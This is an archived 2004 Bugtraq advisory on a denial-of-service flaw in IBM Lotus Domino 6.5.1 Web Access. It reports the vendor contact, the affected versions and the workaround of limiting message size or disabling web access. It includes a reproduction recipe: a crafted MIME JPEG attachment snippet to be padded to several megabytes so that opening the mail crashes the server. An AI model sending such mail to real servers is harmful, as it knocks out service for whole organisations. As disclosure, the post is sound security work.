| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 30 Jun 2004 21:09:59 +0200 (CEST) From: Andreas Klein <Andreas.C.Klein@...sik.uni-wuerzburg.de> To: bugtraq@...urityfocus.com Subject: DoS against Domino 6.5.1 Hello, this problem has been reported to IBM Lotus customer support (PMR 37321,999,724) on Feb 16, 2004 and was reproduced by them. Affected versions: Domino 6.5.1 and newer on Linux (other platforms not tested by me, but Domino 6.5.1 on Windows has been found to be vulnerable too by IBM support) Abstract: Opening certain mails via Domino Web Access leads to a crash of the whole Domino-server. Detailed description: Open your favourite mail-program (eg. pine) and write a message to a person reading his mail via Domino Web Access (formerly known as iNotes) with the following message content: (just paste all the lines below into the body of the mail) --- snip here; do not paste this line -- Content-Disposition: Attachment; filename="PC210017.JPG" Content-Type: image/jpeg; Name="PC210017.JPG" Content-Transfer-Encoding: Base64 /9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN [Add here some megabytes of data. 1kB is not enough, but 12MB was sufficient in all my tests] --- snip here; do not pste this line --- As soon as the recipient opens the mail in Domino Web Access, the whole Domino server will go down. Solution: There is no solution provided by IBM and they are not planning to fix the problem. The proposed workaround is to limit the maximum message-size or to disable the web-access.
Powered by blists - more mailing lists